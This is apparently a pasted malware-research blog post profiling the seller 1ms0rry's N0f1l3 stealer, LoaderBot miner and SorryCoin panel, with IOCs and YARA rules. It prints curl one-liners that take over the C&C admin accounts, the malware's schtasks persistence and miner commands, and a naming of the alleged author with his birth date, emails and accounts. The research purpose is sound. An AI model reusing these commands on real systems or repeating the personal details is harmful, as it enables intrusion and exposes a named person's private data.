Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- benkow_
- dimanche 8 avril 2018
- Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business
- Hey!
- Here we go for another write up, but this time with some friends :D
- This is the work of MalwareMustDie feat NibbleHunters!
- Greetz to .sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, MalwareMustDie, .sS.! (again) and all the froggy scene.
- This post is a quick reminder for the "malware reasearcher" :
- Developing malware and selling them is lame and illegal.
- Introduction
- In this blogpost, we will try to present you another malware actor called 1ms0rry. This guy managed to make itself known by selling a password stealer called N0f1l3 in some hack forums, and maybe you recognized him to be the man behind the miner "1ms0rry-Miner", which is pretty active in the wild these months.
- 1ms0rry was selling builders or/and source code for his malware.
- There is a huge probability that almost all the C&C are controlled by customers and not 1ms0rry himself.
- This write-up is exclusively about this malware developer, not botmaster(s).
- Malware Zoo
- N0f1l3
- The selling ads (RU/Google translate)
- The malware
- The first one is a malware called N0F1L3. Spotted on some forums sold for 20$ the build or 600$ for the source code.
- This password stealer was developed for stealing:
- Browser passwords and cookies (Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex)
- Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)
- Filezilla passwords
- Every file on the desktop with the extensions .txt .doc .docx .log
- This malware is developed in .NET
- Files artefacts:
- %TEMP%\Directory\Browsers\Passwords.txt
- %TEMP%\Directory\Browsers\Cookies.txt
- %TEMP%\Directory\Browsers\CC.txt
- %TEMP%\Directory\Browsers\Autofill.txt
- %TEMP%\[HIWD].zip
- Directories:
- %TEMP%\Directory\Files\Desktop
- %TEMP%\Directory\Files\Filezilla
- %TEMP%\Directory\Wallets\BitcoinCore
- %TEMP%\Directory\Wallets\Electrum
- %TEMP%\Directory\Wallets\LitecoinCore
- %TEMP%\Directory\Wallets\Ethereum
- %TEMP%\Directory\Wallets\Bytecoin
- %TEMP%\Directory\Wallets\Monero
- %TEMP%\Directory\Wallets\DashCore
- Notice that there is no persistence even in the source code published or in the sample in the wild.
- In some sample we found this pdb:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
- this path is the 1ms0rry's computer we will understand why later.
- The interesting fact here it seems that this stealer is targeting Russian browser too.
- It focus on browsers like Yandex and this one is not really used outside Russia.
- The C&C
- The login page:
- The collected logs list:
- Each collected log appears in a separated html file:
- Minimal settings:
- And a search engine:
- The panel is simple but efficient.
- Vulnerabilities
- Since the panel has leaked almost everywhere, and the new versions are patched, let's have a view on the vulnerabilities available.
- You can easily change the admin password.
- If you look at the first lines of cmd.php (the gate):
- You just need to send a POST requests with 3 parameters without authentication for changing the password
- curl -i -X POST -d 'login=admin&password=lulz&change=1' http://n0f1l3cnc.com/cmd.php --header "Referer: http://n0f1l3cnc.com/settings.php"
- The panel also have some unauthenticated iSQL
- IOCs
- PDB related:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
- CNCs and associated samples:
- manganic-rumbles.000webhostapp.com
- 40cfb089f9e02a6038177cbec830f387622f5e2b268797682f67a56c303abee
- tokar222.000webhostapp.com
- b1def07459fbc7d417430edf70330e15ad8a775be00d8ccecd25ff240bd00884
- ih871411.myihor.ru
- 2fdf25b8518afd461969fae0dded14500fc6a53dfe231eb8ceb7982a31df604c
- 9ville.000webhostapp.com
- 46483f88191566a4317d79f27f7a289e3503537ee9e1007661864df82ccc8338
- lmdlm.xyz
- 0604de5851a210255b1314430b421573c19c374476260fc96de8924fab332581
- jwad0w.000webhostapp.com
- 28a076ab9282cc2276e84ae3894d64e42af7a9deb26f0b575e526cd01196678b
- iden1930.000webhostapp.com
- Demo panel
- Yara:
- rule n0f1l3: N0F1L3
- {
- meta:
- description = "N0f1l3 Stealer"
- date = "2018-04-06"
- author = "coldshell"
- reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
- strings:
- $mz = {4D 5A}
- $string1 = "\\Passwords.txt"
- $string2 = "\\Cookies.txt"
- $string3 = "\\CC.txt"
- $string4 = "\\Autofill.txt"
- $string5 = "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data"
- $mz at 0 and all of them
- }
- N0f1leV2
- we found a N0F1l3v2 in the wild
- This sample was injected in a malware cryptor named "Paradox Crypter"
- This cryptor is injected by c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 :
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb
- What's new in the v2? It's now in C++, the stealer also support Firefox for the other part it's just N0f1l3 :)
- 1ms0rry Miner
- Here we go for the 2nd malware, this is a Loader + Miner.
- The selling ads (RU/Google translate)(click to enlarge):
- Prices:
- CPU version - 3000 rubles
- GPU version - 3000 rubles
- EXTENDED version - 5500 rubles
- PRIVATE version - from $ 2000 (discussed individually)
- MULTIACC version - 40 000 rubles / month
- SOURCE - 200 000 rubles
- Bitcoin-purse substitution module - 500 rubles
- Module stellera with admin panel - 2500 rubles
- Resale of licenses is strictly prohibited (starting from 19.01.2018)
- LoaderBot
- Loaderbot is developed in .NET and it reuses a lot of code from N0f1l3.
- It have basic features.
- It kills itself if the task manager or process hacker are launched ("Hides from the task manager, process hacker (absolutely no processes)" feature in the ad).
- The malware installs itself in C:\users\%userprofile%\AppData\Roaming\Windows\
- Persistence is done by:
- Scheduled task: "cmd", "/C "+"schtasks /create /tn \System\\SecurityServiceUpdate /tr %userprofile%\AppData\Roaming\Windows\" + currFilename + " /st 00:00 /du 9999:59 /sc daily /ri 1 /f;
- Registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- A .url file pointing to URL=file://path/to/the/malware
- Available features:
- Update
- Download
- Execute
- Connexion to the C&C is done by GET requests http://cnc.com/cmd.php? :
- hwid: Used as bot ID (VolumeSerialNumber)
- timeout: timeout in case of CNC failure
- completed: task ID completed
- Using the User-Agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
- So, before infecting the victims with a Miner, the attacker install this loader.
- Miner
- The .NET loader drop a miner developed in C++
- The first stage install the final miner:
- copy to %userprofil%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe
- launch a scheduled task schtasks /create /tn \\System\\SecurityService /tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
- Hide the installed files via attrib +s +h
- Looks if taskmgr.exe or processhacker.exe are running
- Detect if a Wallet address is in the clipboard and if so, replace it
- Use RunPE to lauch a fake attrib.exe (final miner). RunPE is done via CreateProcessA(Suspended)/SetThreadContext/WriteProcessMemoryResumeThread/. This code is a copy paste from https://github.com/KernelMode/RunPE-ProcessHollowing
- The final payload is a C++ miner based on xmrig:
- The C&C
- Login page:
- Workers (hi IPv6 :) ):
- Tasks:
- Settings:
- The admin C&C/Market
- When 1ms0rry has developped the Miner, he also has developped a backend called SorryCoin.
- This panel is used by him and his resellers for building samples and support purpose.
- Here you can see 1ms0rry showing sorrycoins and asking for new resellers :
- Panel Instructions:
- Информация о панели
- Личная статистика
- Личная статистика пользователя создана для удобства слежения за своими достижениями и прогрессом.
- В ней будут отображено: общее кол-во сделанных билдов, кол-во продаж, кол-во рекриптов/чисток/выданных обновлений,
- ваша должность, дата регистрации, кол-во заработанных денег, кол-во покупателей в черном списке и ваши SorryCoins
- SorryCoins служат для определения вашего КПД в команде. За каждую чистку/рекрипт/обновление/продажу вам начисляется
- определенное кол-во монет. Каждый месяц каждый участник команды будет получать от меня премию, равную кол-ву
- его монет.
- Билды
- Основная страница. Служит для создания билдов майнера и бота. Необходимо заполнить поля: Пул, кошелек от пула
- (к примеру майнергейта - www@mail.ru), пароль от пула (обычно x), логгер (ссылка для сбора айпи, если не нужен,
- можно указать что угодно если поле не нужно), ссылка на админ-панель (на cmd.php файл,можно указать что угодно
- если поле не нужно), биткоин кошелек подмены (для стиллера биткоинов, можно указать что угодно если поле не нужно),
- цена (полная сумма,которую оплатил клиент), примечание (можно написать что угодно если поле не нужно),
- тип билда и версию, которую приобрел покупатель После создания заявки вам необходимо подождать пока статус вашего
- билда не изменится с queue (очередь) на done (сделано). Далее перейти по ссылкам, скачать файлы и передать клиенту
- Расценки
- Во вкладце "Расценки" опубликованы официальные цены на продукты и информация о вашем доходе с продажи каждого.
- Они могут изменяться, так что проверяйте раз в день.
- Общая статистика
- В общей статистике будет отображен прогресс всей команды. Это: общее кол-во билдов, продаж,
- рекриптов/чисток/обновлений, участников команды, заработанных денег, покупателей в черном списке
- Материалы
- В этой вкладке опубликованы самые последние материалы для майнера, информация о версиях майнера, бота и стаба.
- Черный список
- Раздел создан для удобства общения с клиентами (сарказм). Если вы кому-то отказываете в поддержке, необходимо
- внести данного клиента в базу и написать его контакты, никнейм и причину отказа.
- Лог посещений
- Страница, доступная только админу. Отображает логи посещений пользователей. Позволяет выявлять шэринг аккаунта.
- Пользователи
- База пользователей (команды) в которой можно отследить прогресс других участников
- TODO
- Список того, что нужно сделать. Удобно, если вам нужно что-то записать. Для каждого индивидуальная записная
- книжка - никто другой не сможет ее посмотреть.
- Google translate:
- Panel Information
- Personal stats
- The personal statistics of the user is created for convenience of tracking of the achievements and progress.
- It will display: the total number of builds made, the number of sales, the number of recs / purges / issued updates,
- your position, the date of registration, the number of earned money, the number of buyers in the black list and your SorryCoins
- SorryCoins serve to determine your efficiency in the team. For each cleaning / precription / update / sale you are credited
- with a certain number of coins.
- Each month each member of the team will receive from me a bonus equal to the number of his coins.
- Builds
- Main page. Serves to create a Miner and Bot build. You need to fill in the fields: Poole, purse from the pool
- (for example, minergate - www@mail.ru),password from the pool (usually x), logger (link for collecting ip,
- if you do not need it, you can specify anything if the field is not needed)
- link to the admin panel (on the cmd.php file, you can specify anything if the field is not needed),
- bitcoin substitution wallet (for the bitcoin styler, you can specify anything if the field is not needed),
- the price (the total amount paid by the client) note (you can write anything if the field is not needed),
- the build type and the version purchased by the buyer
- After creating the application, you need to wait until the status of your build changes from the queue on done.
- Next go to the links, download the files and send to the client
- Pricing
- In the "Prices" tab you can find official prices for products and information about your income from the sale of each.
- They can change, so check it once a day.
- general Statistics
- The overall statistics will show the progress of the whole team. This: the total number of builds,
- sales, recs / purges / updates, team members, earned money, buyers in the blacklist
- Materials
- In this tab the most recent materials for the miner, information about the versions of the miner, bot and stub are published.
- Black list
- The section is created for convenience of dialogue with clients (sarcasm). If you deny support to someone,
- you need to enter this customer into the database and write his contacts, nickname and the reason for the refusal.
- Log of visits
- Page, accessible only to the administrator. Displays the logs of user visits. Allows you to identify account sharing.
- Members List
- Database of users (teams) in which you can track the progress of other participants
- TODO
- A list of what needs to be done. Convenient if you need to write something down.
- For each individual notebook - no one else will be able to see it.
- Panels Overview:
- Vulnerabilities
- As usual, code reuse = vuln reuse. The admin account takeover is still her:.
- curl -i -X POST -d 'login=admin&password=mypass¬e=&type=admin&useradd=1' http://S0rryCoinCnC/cmd.php --header "Referer: http://S0rryCoinCnC/users.php"
- IOCs
- PDB related:
- C:\Users\gorno\Documents\Visual Studio 2015\Projects\GPULoader\GPULoader\obj\Release\GPULoader.pdb
- c:\Users\User\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
- c:\inetpub\wwwroot\Bot\Miner\obj\Release\LoaderBot.pdb
- C:\Users\gorno\Desktop\RelWithDebInfo\xmrig.pdb
- C:\Users\gorno\Desktop\[NEW] builder\Miner\Release\winhost.pdb
- c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
- CNCs and associated samples:
- ih753479.myihor.ru
- b25c3eda59e0014df05c9aa4451ab09c2153ddb919e105a693f1f8923e465157
- ih894017.myihor.ru
- e61d08bea42a6d2d49819e81e18b76db4413a1d80abeac8d8f8a75f18b940b24
- ih895435.myihor.ru
- 867e605f0dc7d8e5aa62a9db99ebc8f12b1c09713707298c3c70e0294d14ebb7
- ih903818.myihor.ru
- a8c7f6dbc844a2b8b10e1751f65453b20392fa82caa9e83fcce3c496b3021fba
- sawerticq.myihor.ru
- 45cec8803dd773469012d80afd3abf3eaf9a8f8b938a03ce8e52c2cba6dd28d2
- pokerhot.ru
- 22fdc1c82acda24c3684f0cdc53128e6f24c32c564e0e8f0488d4d0f55ee7f2c
- f448e4d1d52f46ab79ddf77f93fb28324439c2441c399d4224a570d87c1b556d
- f3d8e6abc1b725b5bf73cf8ed39b517f00fd46e65dfa23432ec7119d4d3b4d64
- d8287fd95435c00ef70c162a9bfd9b359e43d3b75cb764d5ec5b1d545b3f2133
- 0c0d58b488dafcfb632a7e020ceef22f95e68f9e6c55036f0a2f0b816da40bd1
- 95f89b82eda0548b93a0d62fb73446d32bdaa83d9d6ae4906a927d3e903e99e7
- 45551ae1c8cb97fe51b826f3f740ebcfd8ef061f14bcf458eeb2176b2d826050
- aa9f2b763d3eebf6060e6b41c56520b2fd66fca87789dd6528703dcd33b67567
- 17ead882b04f22054b6ee06bf04e7b64eb7289a5c7f01f9faff397dad50287c6
- ivanvarb.beget.tech
- 6de67141c7602544ca75cab06d840716d8eec9474bd744b39aa0f071b44ad16f
- 2e57dc399aeb974b12e299a042ae051ab09c039794dfc495b99e76f8a5aeb4bc
- 830bc74e10ac5a9baf6461081eed5496dc293145d184a10c60303b5f289835b6
- 8460ae8685964f1922dc1cbe1e19f6714d41b801487da647a6c6bea3ded3ac2c
- 600d00bb9b94b1164670c3e210271ba1623b9f44da681f66a8235e6c8e553470
- 3c44f07a1930bdcceae1bd01138a71fc2c9bf87138dc324477dbe39b9ae01bc0
- a358e56c91218b5f21d54556fb7aef5de158da4764c9cf8e5d71e3e41ff4841f
- 49cb77361d08c86faf572829baa1ba06a7581254ddc45f074d67f72852c64152
- 195b79a3ee7275081aa538ba2e619864d9504c5bce6744334cfca5c5990fd1d2
- 26188b4be138b3bb3bef2d3a0eb98fbba83020f09bde0b2da4ee92f2c887df9c
- 5d286edf2f49dc61a3f70e6c25e13d92ae36f284b9b27440cc8f5bcd0084662e
- 2d98bd04d906c6600b6c2a1cf4ef2f60a2af1656b1a6f8b01913bd6d157a87b4
- 4d646cfc9cc82420a8d4028989322fb006eba07400ee4705f91fe1604cbe1513
- b3648a2dbed0e1833b3278729c210144145696fd908aad3a4e991ef566d6d903
- 4c25f0f6a78b5bf7cb047446a458154cbbdf522c2bdea3daf2682eed168c7814
- krasotka-kuphino.ru
- 2b099e9ab15b5056b0e4b09ea5751ecb76ebce1b02251c4a23fc133ea04918ee
- 81660ecc8467a284b689afdc3b60b5faa73b2a8385c57000e6c19f05944cf714
- e5ecf75fe7991a351e52d64d14e6fb96c9d6eec7f5a0ccc64ea67753be03714a
- 6fa7da5f3026074b6c2a4b98865175f024941057a8c55d5516797f928a737195
- panel.enable.pw
- aa5037e15d6c2ea27fff9726cc3951660490273726edc9510a5e78d0afb82e68
- t3h1337.se
- 76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28
- d50a5373add2eb3e94a7b341781a3b09521e5c13387ace7f73995fe810c287ff
- f31a16510da94c57ca0864562186a69540c5f2024f15d6d2eabd21f2a847fabc
- 66370e465351ce5da550f34afd0e03ff91fb906f077412a4c3f3c40a74c67e21
- b037861cb7b32607f917146c2dc8e67109b9389ff1e2808c10681e7a953dd85c
- 0e346d3f905acff6aa5fe1479b7ce9a5957312838061620f624749d8ddb1e180
- cbbce47b73a43b76c501717cd99243e2cbc226184e9828ca7887ac7d38fe5099
- f11e1379b1d1f74d6ef738841eba0b7c125c8717f6411ce5cf12e695caf028c4
- e3f5668ed13b860d5b90e3c9e99015ecef8985343ab4057c83fce3f8bc119bc8
- 4f443a5c0189878a20e9fe59642bc68c4d78c7ee4cd6a1f1e35fff25600fafb4
- 974a28dd21a0a25393180e9abf656d4e2583422c5d1102aeca7d839de29f10ac
- cq95452.tmweb.ru
- f80742032ff611f7e569f4f9b1d879377f81a3ae2a85e0234c161de5122058b0
- 2cfa2019f3002c7ea1f9cb1555caa5b84554f68e1cd54a436c9aa67a9359286f
- uomomo.tmweb.ru
- eb7d44264bc83c2f77958342aede1d2d266ee53380295ce9fd3e3630780031c9
- 67864.prohoster.biz
- cd2874a83ca324eebbeaa134330d667aee72d28ded20bd44d4d48c91ce6474b1
- 109.234.36.233
- a80038832522f8a4a0d5bfba7755ac73d506a0c523e8f86a4d7ae2dc798c0937
- c577a5ddbdf85ab2a168223d80981cf1d835f15dbf0437cc43b5801cc37010a6
- 61d75bf9a006dcfea78e0c792cc4db7b0de82cd847d30680be08c463eaaf643f
- sorry.enable.pw
- 2d6e94a539f89b3dfc3c8ced8ca7facf3840a3706fa6079a9328234133936143
- zlives.ru
- b0220a121e1daf7fc21f1869ceb4a588a1935ff4a7dbcc8660e8c661f40c26bb
- 66ce33495863914fee2bc0355d6911b0912150cbad0846721d9cf769858029b5
- 5da4dbdd3d67abcd38df00aabc4f9a9393751e89c98a08d9ce946c47d1672eff
- aa4fd3dc52be981c482d955287c2c13f0b2535e5d351516a49f9150c62a92714
- f15a876dcf2b9f226d4b61b847e3d15923cb04d7883a9aef757af3ed3d62f2b6
- 36e0a614810635c9c3d9091d91f476e1cce822ff6aba34e2f9ecb818faa018cb
- 3c14574aafdef0e216a289aff47704eb5d1071081594b2740f08a6fe6551dbfe
- 49755ff17be7bf0510fde970c2a6dd9d033b2b92322ae44b47276c28f7fdc78e
- 473cc575686c060c86aa5b78128832bdbbe4ce3352ce60a7e9c06dd36383b1b7
- 7f3e3ff028f521a50f1f8abd6549d092f198836993553e36e05981fe723daae3
- ac865ff6cddbd825d459342dc1bbb91bee32cff945e4d717ad956d497acb213a
- acf14c531bb5fc391a7a72ddd0e3ce9ea04939b8e6068f3667dc49896ffe90f4
- 81d51d7659dee946512cae617ea5215e2ca0945200d397052c1d4d137e810481
- 873bf7726cada94352ae15e5a7520187dfbf33b450131ba41148452f94adfaf9
- 58447db309ca8ec0090194d03f5fddda89b33ecce60306ea567e394c956caf23
- d394e0115fb48be2492cd66f41def6070a0f171149177ad1fb5813d4a531d872
- letstrytomoney.000webhostapp.com
- 79ad0aec7a30a8c3085256a6b36fafdc5448a6392ae79621356e6de6cede90ae
- 6ab8bbf76641e1f04252f7a8a579b2c7a493cd67452222a08260d3ef827113ff
- 1f3d0bf4afc4b31c0e1dac027636c0996cc99e474d6b85d68fd7e27c919d34e6
- plaza777.co.ua
- 50587f56bc5cda5c9c49bfe233cea4a6da70207d34506865d215f6f84d75af17
- v90327ux.beget.tech
- efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8
- moneyrob.info
- b6674acc2314913ad8c8ed14ce50c12b0f6babff3081969d7e2a1ab05f53af96
- ce24411.tmweb.ru
- c443c08c3071d3842b9cc26bbb34125e0baf894600f56b2aaab4519f488a31f3
- 294300b8ec1c41d0a0c71283d02bb359f6c9e38db2d630e1ec6087abf763730f
- 4da1b7cd2e6b5e53f4395eceb2d9180dec678e3c28cdff5ca54bb8526cef4bd8
- 56f9709e665738fd81d0880c4eecc45e678784880cdb83e9808bbff606d41cc9
- a9bdf007c8a31e2034171fdfb20d07a51341e3e4977ef118a9764597d728a0b6
- 711ec24f2a2d1daff050a10fa3c3f2bf6b86a3ce02e785fe2327836ff2c4c9f1
- 68054.prohoster.biz
- fefedc45386b83926aaa6893121bed424be0e0278319a5d97ee0cb74c7133144
- 5.200.55.248
- karlikvm.beget.tech
- 61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992
- Yara:
- rule 1ms0rryMiner: 1ms0rryMiner
- {
- meta:
- description = "1ms0rry Miner"
- date = "2018-04-06"
- author = "benkow_"
- reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
- strings:
- $mz = {4D 5A}
- $string1 = "?hwid="
- $string2 = "&completed="
- $string3 = "?timeout=1"
- $string4 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
- $string5 = "LoaderBot.Properties.Resources"
- $mz at 0 and all of them
- }
- Misc
- TImeline: (click to enlarge)
- Attack vectors
- Some campaigns using 1ms0rry malware:
- Fake fonts: https://www.malware-traffic-analysis.net/2017/11/27/index.html or https://www.malware-traffic-analysis.net/2017/11/12/index.html
- Fake Flash installer : https://www.malware-traffic-analysis.net/2018/01/02/index2.html
- >https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100 : This sample is really interesting.
- The infection chain is :
- github.com/vaio666999/2/blob/master/GoogleUpdater.exe << LoaderBot :: sorry.enable.pw/cmd.php?hwid=24C2B6A0
- github.com/vaio666999/2/raw/master/GoogleUpdate.exe << Rarog :: api.enable.pw/2.0/method/checkConnection
- github.com/vaio666999/2/raw/master/xmrig32.exe User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
- xmrig32.exe -o xmr.pool.minergate.com:45560 -u stasmiomi@gmail.com -p x -k -t 1
- 61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992 is Rarog
- Backdoored software:
- efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8 - RDP Bruter
- 76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28 - WinDjView setup
- c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 - Paradox Crypter
- Competitive analysis
- This actor is really active on his GitHub. Thanks to him, this is a gold mine to have some information about what is going on seller forums. He decompiled a bunch of malware and analyzed them on telegra.ph and pushed all sources on his repository. This is a good way for him to check if there is no copycat for his miner. For example, when he analyzed a miner developed by EvilBanana. He mentioned that is a bad copy of "his" miner explicitly :
- the highlight sentence means "this miner turned out to be my miner of the first version, but it's a little broken for some reason"
- He reviewed some diversity of malware/tools (miners, botnet, loaders...) and tried to explain if features were really well developed and effective, or it's just basic crappy stuff..
- Reviews are available there :
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31
- http://telegra.ph/Analiz-botneta-DarkSky-12-30
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20
- http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05
- http://telegra.ph/Pishem-kejlogger-na-C-12-07
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10
- http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12
- http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25
- http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28
- http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01
- http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04
- http://telegra.ph/Analiz-stillera-ot-xZist-01-06
- http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09
- http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22
- Forks
- Some Fork example:
- FelixHTTP (N0f1l3 fork):
- Ref:
- https://twitter.com/siri_urz/status/974205197407932416
- 40089ea9af2c1191fd9dfec5c49d1c37809b9eae8609bcaa810346e81ca3384a
- freexmr.ru
- BUMBLEBEE MinerPanel:
- Ref:
- https://twitter.com/malwrhunterteam/status/956155159469608960
- ih803741.myihor.ru
- EnlightenedHTTP
- Ref:
- https://twitter.com/ViriBack/status/962051515526520832
- 179.43.147.227/mine/
- v90327ux.beget.tech
- 1754d64016c758a65cb85df328ffd502a7255a6855d976e3bdeb497f95201848
- Evrial
- Evrial (https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/) use code from 1ms0rry for sure:
- Who is 1MS0RRY ?
- Now let's try to understand who is 1ms0rry.
- We know that he as :
- a Twitter account: https://twitter.com/ims0rry_off
- a Telegram account: https://t.me/ims0rryblog
- a Github account: https://github.com/ims0rry/
- Let's try to get the nickname and the email used to commit in the Github account.
- This command gives us (full details in the annex section):
- gornostay322@mail.ru
- lordatsa@mail.ru
- your_email@whatever.com
- with the nicknames:
- Gatsoev
- hype
- ims0rry
- s0rry
- Your Name
- lordatsa@mail.ru give us a mail.ru account https://my.mail.ru/mail/lordatsa/photo
- We now have a name Аца Гацоев (Atsa Gatsoev)
- All these information help us to find this Weblancer profile: https://www.weblancer.net/users/hypega/
- This profile is interesting because:
- the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as the mail.ru account
- The username used is hypega. hype was used to commit on github, hypega for "hypeGatsoev
- The personal website in the profils information is http://lordatsa.wix.com/gatsoevsummary lordatsa is used as username for mail.ru
- http://lordatsa.wix.com/gatsoevsummary is also interesting:
- VK Account: https://vk.com/quiet_and_invisible
- G+ account: https://plus.google.com/u/0/109976643017066209762/posts/p/pub
- the VK account looks down but the photos in the G+ account points to 1ms0rry again:
- The G+ account allows us to switch to the related Youtube account:
- Now, take a deeper look at this video https://youtu.be/zPRo3hkVbrQ?t=4
- This directory [NEW] builder on the desktop reminds us LoaderBot pdb :
- c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb
- In https://youtu.be/KUvLk20-NZk?t=6 at 6sec we can see Thermida and a local path C:\Users\gorno
- In https://www.youtube.com/watch?v=KUvLk20-NZk at 1 sec we can see the viruscheckmate user wich is hypega (again)
- His freelancer account is interesting too, https://freelance.ru/hypega.
- it allows us to retrieve 2 links:
- * A Portfolio website: lordatsa.wix.com/e-consultant (via https://freelance.ru/hypega/elektronny-konsultant-2810410.html)
- * A GitHub account: github.com/Gatsoev/Nerve_MobileApp (via https://freelance.ru/hypega/pr-agent-2966193.html)
- This Github account is a perfect proof.
- Let's take a look a for example https://github.com/Gatsoev/csgo.tm-fakeSellExtension.
- Curious isn't it ? It looks like the Github account was just renamed.
- We now have enough proof for linking 1ms0rry to Ацамаз Гацоев / Atsamaz Gatsoev
- Who the hell is Atsamaz Gatsoev? We can find a protential picture of him in his weblancer profile :
- Confirmed by Alan Salbiev from Education Ministry on a Facebook post.
- Alan Salbiev describes 1ms0rry like that:
- Google translate:
- Atsamaz Gatsoev.
- 11-grad student from Vladikavkaz.
- He ran and published in his blog theme more than 20 research papers in the field of information security, in particular, virology,
- namely: analysis of protection and opening of various vredosnogo software, methods of cyber attacks and protecting against them.
- Over 1,400 people signed it.
- December 2-3, 2017 in Vladikavkaz was held the first hackathon among high school students for the prize of the Head of the Republic
- in which Atsamaz acted as a mentor.
- Atsamaz he organized and conducted twice a thematic Olympiad on CTF (Capture the flag) of information security in the format Task-based,
- which was attended by over 100 people from different cities and countries.
- In addition, with the direct participation Atsamaz (design, commissioning and start-up) in the work of our Office has been implemented
- application based on the principles of distributed data registry (blokcheyn - technology)
- February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,
- Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersbur>.
- At Atsamaz there is a dream - to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy.
- Special mention should be noted that the successes Atsamaz lies the great work of his parents, who were able to instill in him the
- awareness, independence, the desire for knowledge and hard work. Take an example from them.
- It's easy to protect against malware when you develop them, isn't it ?
- TL;DR:
- (We only keep information related to his malware activities.)
- Name: Ацамаз Гацоев, Atsamaz Gatsoev,
- Born: 1997 Aug. 14
- Location: Tskhinvali region
- Nickname: 1ms0rry, gorno, hypega, Gatsoev, lordatsa, atsam;
- Email: lordatsa@mail.ru gornostay322@mail.ru
- Social: https://vk.com/quiet_and_invisible https://twitter.com/ims0rry_off https://github.com/ims0rry/ https://plus.google.com/u/0/109976643017066209762/
- There is enough information for knowing exactly who is 1ms0rry :)
- Conclusion
- Obviously, this write-up doesn't cover every malware (you can find some telegra.ph bot) but it's enough data if somebody needs to go deeper.
- This is not a major threat actor, malware developed by him are not really advanced and the web panels are basic (except the design !) but the SorryCoin backend was interesting.
- It is obvious that here, Ацамаз Гацоев is a malware developer/reseller and not a researcher or a red-teamer that develops malware for POC purpose.
- Just in case of, we archived all the links (forum, twitter, telegraph...) on archive.org :).
- That all folks!
- We hope you enjoy the read if you need more information don't hesitate to ping us
- Thanks again to MalwareMustDie and sS.! for the awesome work and greetz to NibbleHunter
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement